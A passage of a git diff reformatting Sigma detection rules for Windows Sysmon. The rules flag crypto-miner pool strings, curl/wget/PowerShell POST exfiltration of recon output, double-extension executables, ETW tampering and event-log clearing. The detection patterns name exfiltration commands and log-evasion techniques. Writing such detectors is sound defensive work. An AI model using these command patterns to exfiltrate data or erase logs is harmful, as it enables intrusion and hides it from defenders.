' --algo=rx/0 ' - stratum+tcp:// - stratum+udp:// + # base64 encoded: --donate-level= - LS1kb25hdGUtbGV2ZWw9 - 0tZG9uYXRlLWxldmVsP - tLWRvbmF0ZS1sZXZlbD + # base64 encoded: stratum+tcp:// and stratum+udp:// - c3RyYXR1bSt0Y3A6Ly - N0cmF0dW0rdGNwOi8v - zdHJhdHVtK3RjcDovL @@ -37,7 +39,7 @@ detection: - N0cmF0dW0rdWRwOi8v - zdHJhdHVtK3VkcDovL filter: - CommandLine|contains: + CommandLine|contains: - ' pool.c ' - ' pool.o ' - gcc - diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml index 5affd2a37..6100c416c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml @@ -23,50 +23,49 @@ detection: - \powershell.exe - \pwsh.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' - 'curl ' - CommandLine|contains|all: - - ' -ur' - - ' -me' + CommandLine|contains|all: + - ' -ur' # Shortest possible version of the -uri flag + - ' -me' # Shortest possible version of the -method flag - ' -b' - ' POST ' selection_curl: Image|endswith: \curl.exe - CommandLine|contains: --ur + CommandLine|contains: --ur # Shortest possible version of the --uri flag selection_curl_data: - CommandLine|contains: - - ' -d ' + CommandLine|contains: + - ' -d ' # Shortest possible version of the --data flag - ' --data ' selection_wget: Image|endswith: \wget.exe - CommandLine|contains: + CommandLine|contains: - --post-data - --post-file payloads: - - CommandLine|contains: - - Get-Content - - GetBytes - - hostname - - ifconfig - - ipconfig - - net view - - netstat - - nltest - - qprocess - - sc query - - systeminfo - - tasklist - - ToBase64String - - whoami - - CommandLine|contains|all: - - 'type ' - - ' > ' - - ' C:\' - condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) - and payloads) + - CommandLine|contains: + - Get-Content + - GetBytes + - hostname + - ifconfig + - ipconfig + - net view + - netstat + - nltest + - qprocess + - sc query + - systeminfo + - tasklist + - ToBase64String + - whoami + - CommandLine|contains|all: + - 'type ' + - ' > ' + - ' C:\' + condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) and payloads) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml index 7a0e1504f..e1fdadf74 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml @@ -1,8 +1,7 @@ title: Raccine Uninstall id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc status: test -description: Detects commands that indicate a Raccine removal from an end system. - Raccine is a free ransomware protection tool. +description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. references: - https://github.com/Neo23x0/Raccine author: Florian Roth (Nextron Systems) @@ -20,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - 'taskkill ' - RaccineSettings.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - reg.exe - delete - Raccine Tray selection3: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - /DELETE - Raccine Rules Updater diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml index 8f5f5c59b..2bb8c470b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml @@ -1,17 +1,14 @@ title: Suspicious Double Extension File Execution id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 related: - - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c - type: similar + - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine + type: similar status: stable -description: Detects suspicious use of an .exe extension after a non-executable file - extension like .pdf.exe, a set of spaces or underlines to cloak the executable - file in spear phishing campaigns +description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns references: - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html - https://twitter.com/blackorbird/status/1140519090961825792 -author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) date: 2019/06/26 modified: 2023/02/28 tags: @@ -47,7 +44,7 @@ detection: - .rtf.js - .pdf.js - .txt.js - CommandLine|contains: + CommandLine|contains: - .doc.exe - .docx.exe - .xls.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml index 30b0cd171..4238c3dfe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml @@ -1,8 +1,8 @@ title: Suspicious Parent Double Extension File Execution id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c related: - - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 - type: derived + - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine + type: derived status: test description: Detect execution of suspicious double extension files in ParentCommandLine references: @@ -23,44 +23,44 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ParentImage|endswith: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js - - ParentCommandLine|contains: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js + - ParentImage|endswith: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js + - ParentCommandLine|contains: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml index f02fc942c..57dd56a01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml @@ -1,8 +1,7 @@ title: Suspicious Download from Office Domain id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1 status: test -description: Detects suspicious ways to download files from Microsoft domains that - are used to store attachments in Emails or OneNote documents +description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents references: - https://twitter.com/an0n_r0/status/1474698356635193346?s=12 - https://twitter.com/mrd0x/status/1475085452784844803?s=12 @@ -22,24 +21,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_download: - - Image|endswith: - - \curl.exe - - \wget.exe - - CommandLine|contains: - - Invoke-WebRequest - - 'iwr ' - - 'curl ' - - 'wget ' - - Start-BitsTransfer - - .DownloadFile( - - .DownloadString( + - Image|endswith: + - \curl.exe + - \wget.exe + - CommandLine|contains: + - Invoke-WebRequest + - 'iwr ' + - 'curl ' + - 'wget ' + - Start-BitsTransfer + - .DownloadFile( + - .DownloadString( selection_domains: - CommandLine|contains: + CommandLine|contains: - https://attachment.outlook.live.net/owa/ - https://onenoteonlinesync.onenote.com/onenoteonlinesync/ condition: process_creation and (all of selection_*) falsepositives: - - Scripts or tools that download attachments from these domains (OneNote, Outlook - 365) + - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml index e41bd776c..af2340fda 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml @@ -20,7 +20,7 @@ detection: selection: Image|endswith: \DumpStack.log selection_download: - CommandLine|contains: ' -o DumpStack.log' + CommandLine|contains: ' -o DumpStack.log' condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml index 32f55f6fb..6e5363bff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml @@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentImage|contains|all: - \Windows\Installer\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml index 7cf39fc2a..8701fabb4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml @@ -1,15 +1,11 @@ title: Suspicious Electron Application Child Processes id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 related: - - id: 378a05d8-963c-46c9-bcce-13c7657eac99 - type: similar + - id: 378a05d8-963c-46c9-bcce-13c7657eac99 + type: similar status: experimental -description: 'Detects suspicious child processes of electron apps (teams, discord, - slack, etc.). This could be a potential sign of ".asar" file tampering (See reference - section for more information) or binary execution proxy through specific CLI arguments - (see related rule) - - ' +description: | + Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) references: - https://taggart-tech.com/quasar-electron/ - https://github.com/mttaggart/quasar @@ -33,7 +29,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: - - \chrome.exe + # Add more electron based app to the list + - \chrome.exe # Might require additional tuning + # - '\code.exe' # Requires additional baseline - \discord.exe - \GitHubDesktop.exe - \keybase.exe @@ -44,6 +42,7 @@ detection: - \Teams.exe selection_child_image: Image|endswith: + # Add more suspicious/unexpected paths - \cmd.exe - \cscript.exe - \mshta.exe @@ -53,6 +52,7 @@ detection: - \wscript.exe selection_child_paths: Image|contains: + # Add more suspicious/unexpected paths - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\ @@ -60,6 +60,15 @@ detection: filter_main_chrome: ParentImage|endswith: \chrome.exe Image|endswith: \chrome.exe + # filter_main_code_1: + # ParentImage|endswith: '\code.exe' + # Image|endswith: '\code.exe' + # filter_main_code_2: + # # Note: As code allows many other programs its best to baseline this + # ParentImage|endswith: '\code.exe' + # Image|endswith: + # - '\cmd.exe' + # - '\powershell.exe' filter_main_discord: ParentImage|endswith: \discord.exe Image|endswith: \discord.exe @@ -90,10 +99,10 @@ detection: - C:\Windows\System32\WerFault.exe filter_optional_discord: ParentImage|endswith: \Discord.exe - CommandLine|contains: \NVSMI\nvidia-smi.exe - condition: process_creation and (selection_parent and 1 of selection_child_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + CommandLine|contains: \NVSMI\nvidia-smi.exe + condition: process_creation and (selection_parent and 1 of selection_child_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate child processes can occur in cases of debugging +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml index 09be74368..eaa111a99 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml @@ -1,12 +1,10 @@ title: Potentially Suspicious Electron Application CommandLine id: 378a05d8-963c-46c9-bcce-13c7657eac99 related: - - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 - type: similar + - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 + type: similar status: experimental -description: Detects potentially suspicious CommandLine of electron apps (teams, discord, - slack, etc.). This could be a sign of abuse to proxy execution through a signed - binary. +description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. references: - https://positive.security/blog/ms-officecmd-rce - https://lolbas-project.github.io/lolbas/Binaries/Teams/ @@ -28,32 +26,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \chrome.exe - - \code.exe - - \discord.exe - - \GitHubDesktop.exe - - \keybase.exe - - \msedge_proxy.exe - - \msedge.exe - - \msedgewebview2.exe - - \msteams.exe - - \slack.exe - - \Teams.exe - - OriginalFileName: - - chrome.exe - - code.exe - - discord.exe - - GitHubDesktop.exe - - keybase.exe - - msedge_proxy.exe - - msedge.exe - - msedgewebview2.exe - - msteams.exe - - slack.exe - - Teams.exe + - Image|endswith: + # Add more electron based app to the list + - \chrome.exe + - \code.exe + - \discord.exe + - \GitHubDesktop.exe + - \keybase.exe + - \msedge_proxy.exe + - \msedge.exe + - \msedgewebview2.exe + - \msteams.exe + - \slack.exe + - \Teams.exe + - OriginalFileName: + # Add more electron based app to the list + - chrome.exe + - code.exe + - discord.exe + - GitHubDesktop.exe + - keybase.exe + - msedge_proxy.exe + - msedge.exe + - msedgewebview2.exe + - msteams.exe + - slack.exe + - Teams.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --browser-subprocess-path - --gpu-launcher - --renderer-cmd-prefix @@ -61,5 +61,6 @@ detection: condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage for debugging purposes +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml index 1a6494da0..13b2d6f42 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml @@ -1,11 +1,10 @@ title: Elevated System Shell Spawned From Uncommon Parent Location id: 178e615d-e666-498b-9630-9ed363038101 related: - - id: 61065c72-5d7d-44ef-bf41-6a36684b545f - type: similar + - id: 61065c72-5d7d-44ef-bf41-6a36684b545f + type: similar status: experimental -description: Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges from a uncommon parent location. +description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. references: - https://github.com/Wh04m1001/SysmonEoP author: frack113, Tim Shelton (update fp) @@ -25,43 +24,50 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_shell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI LogonId: '0x3e7' filter_main_generic: + # Example 1: + # C:\Program Files\erl-23.2\erts-11.1.4\bin\erl.exe" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers [] + # Example 2: + # ParentImage: C:\Program Files (x86)\Varonis\DatAdvantage\GridCollector\VrnsRealTimeAlertsSvc.exe" /appid 000000ad-cb03-500b-9459-c46d000000ad + # CommandLine: C:\Windows\system32\cmd.exe /c C:\Program Files "(x86)\Varonis\DatAdvantage\GridCollector\handle_scopes.cmd C:\Collector" Working Share\VaronisWorkDirectoryCollector ParentImage|contains: - :\Program Files (x86)\ - :\Program Files\ - :\ProgramData\ - :\Windows\System32\ - :\Windows\SysWOW64\ - - :\Windows\Temp\ + - :\Windows\Temp\ # Installers - :\Windows\WinSxS\ filter_optional_manageengine: + # Example: + # ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe" --forkarch 5380 + # CommandLine: C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat pg_wal\000000010000008E000000EA 000000010000008E000000EA) ParentImage|endswith: :\ManageEngine\ADManager Plus\pgsql\bin\postgres.exe Image|endswith: \cmd.exe filter_optional_asgard: - CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " + CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " CurrentDirectory|contains: :\WINDOWS\Temp\asgard2-agent\ filter_optional_ibm_spectrumprotect: ParentImage|contains: :\IBM\SpectrumProtect\webserver\scripts\ - CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ + CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: '' - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml index 30c1ce844..93b5e2acf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml @@ -1,8 +1,7 @@ title: Hidden Powershell in Link File Pattern id: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a status: test -description: Detects events that appear when a user click on a link file with a powershell - command in it +description: Detects events that appear when a user click on a link file with a powershell command in it references: - https://www.x86matthew.com/view_post?id=embed_exe_lnk author: frack113 @@ -21,7 +20,7 @@ detection: selection: ParentImage: C:\Windows\explorer.exe Image: C:\Windows\System32\cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .lnk condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml index 54e2c7058..9875556bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml @@ -1,9 +1,7 @@ title: ETW Logging Tamper In .NET Processes id: 41421f44-58f9-455d-838a-c398859841d4 status: test -description: Detects changes to environment variables related to ETW logging. This - could indicate potential adversaries stopping ETW providers recording loaded .NET - assemblies. +description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. references: - https://twitter.com/_xpn_/status/1268712093928378368 - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr @@ -30,7 +28,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - COMPlus_ETWEnabled - COMPlus_ETWFlags condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml index 9c5dce15a..0f829b9ad 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml @@ -1,8 +1,7 @@ title: Disable of ETW Trace id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 status: test -description: Detects a command that clears or disables any ETW trace log which could - indicate a logging evasion. +description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil - https://abuse.io/lockergoga.txt @@ -24,32 +23,32 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_clear_1: - CommandLine|contains|all: + CommandLine|contains|all: - cl - /Trace selection_clear_2: - CommandLine|contains|all: + CommandLine|contains|all: - clear-log - /Trace selection_disable_1: - CommandLine|contains|all: + CommandLine|contains|all: - sl - /e:false selection_disable_2: - CommandLine|contains|all: + CommandLine|contains|all: - set-log - /e:false - selection_disable_3: - CommandLine|contains|all: + selection_disable_3: # ETW provider removal from a trace session + CommandLine|contains|all: - logman - update - trace - --p - -ets - selection_pwsh_remove: - CommandLine|contains: Remove-EtwTraceProvider - selection_pwsh_set: - CommandLine|contains|all: + selection_pwsh_remove: # Autologger provider removal + CommandLine|contains: Remove-EtwTraceProvider + selection_pwsh_set: # Provider “Enable” property modification + CommandLine|contains|all: - Set-EtwTraceProvider - '0x11' condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml index b2ddb3387..b0d262801 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -1,9 +1,7 @@ title: Suspicious Eventlog Clear or Configuration Change id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 status: stable -description: Detects clearing or configuration of eventlogs using wevtutil, powershell - and wmic. Might be used by ransomwares during the attack (seen by NotPetya and - others). +description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html @@ -28,17 +26,17 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_wevtutil: Image|endswith: \wevtutil.exe - CommandLine|contains: - - 'clear-log ' - - ' cl ' - - 'set-log ' - - ' sl ' - - 'lfn:' + CommandLine|contains: + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' + - 'lfn:' # change log file location and name selection_other_ps: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - 'Clear-EventLog ' - 'Remove-EventLog ' - 'Limit-EventLog ' @@ -48,12 +46,15 @@ detection: - \powershell.exe - \pwsh.exe - \wmic.exe - CommandLine|contains: ClearEventLog + CommandLine|contains: ClearEventLog filter_msiexec: + # Example seen during office update/installation: + # ParentImage: C:\Windows\SysWOW64\msiexec.exe + # CommandLine: "C:\WINDOWS\system32\wevtutil.exe" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false ParentImage: - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\System32\msiexec.exe - CommandLine|contains: ' sl ' + CommandLine|contains: ' sl ' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Admin activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml index e2f4d425d..723065792 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf related: - - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f - type: derived + - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f + type: derived status: experimental -description: 'Detects execution of different log query utilities and commands to search - and dump the content of specific event logs or look for specific event IDs. - - This technique is used by threat actors in order to extract sensitive information - from events logs such as usernames, IP addresses, hostnames, etc. - - ' +description: | + Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. + This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -37,46 +33,52 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' selection_logs_name: - CommandLine|contains: + CommandLine|contains: + # Note: Add more event log channels that are interesting for attackers - Microsoft-Windows-TerminalServices-LocalSessionManager/Operational - Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational - Security selection_logs_eid: - CommandLine|contains: + CommandLine|contains: + # Note: We use the "?" to account for both a single and a double quote + # Note: Please add additional interesting event IDs + # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers. + # This covers EID 4624 from Security Log - -InstanceId 4624 - System[EventID=4624] - EventCode=?4624? - EventIdentifier=?4624? + # This covers EID 4778 from Security Log - -InstanceId 4778 - System[EventID=4778] - EventCode=?4778? - EventIdentifier=?4778? + # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log - -InstanceId 25 - System[EventID=25] - EventCode=?25? - EventIdentifier=?25? - condition: process_creation and (1 of selection_logs_* and (selection_wmi or all - of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) + condition: process_creation and (1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) falsepositives: - Legitimate usage of the utility by administrators to query the event log level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml index e1f8a640c..5a4173636 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml @@ -1,8 +1,7 @@ title: Suspicious Execution From GUID Like Folder Names id: 90b63c33-2b97-4631-a011-ceb0f47b77c3 status: test -description: Detects potential suspicious execution of a GUID like folder name located - in a suspicious location such as %TEMP% as seen being used in IcedID attacks +description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks references: - https://twitter.com/Kostastsale/status/1565257924204986369 author: Nasreddine Bencherchali (Nextron Systems) @@ -16,15 +15,20 @@ logsource: category: process_creation product: windows detection: + # Uncomment this section and remove the filter if you want the rule to be more specific to processes + # selection_img: + # Image|endswith: + # - '\rundll32.exe' process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_folder: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious or unexpected paths - \AppData\Roaming\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # This could generate some FP with some installers creating folders with GUID selection_guid: - CommandLine|contains|all: + CommandLine|contains|all: - \{ - '}\' filter: @@ -32,12 +36,11 @@ detection: - \{ - '}\' filter_null: - Image: null - filter_driver_inst: + Image: + filter_driver_inst: # DrvInst.exe "4" "0" "C:\Users\venom\AppData\Local\Temp\{a0753cc2-fcea-4d49-a787-2290b564b06f}\nvvhci.inf" "9" "43a2fa8e7" "00000000000001C0" "WinSta0\Default" 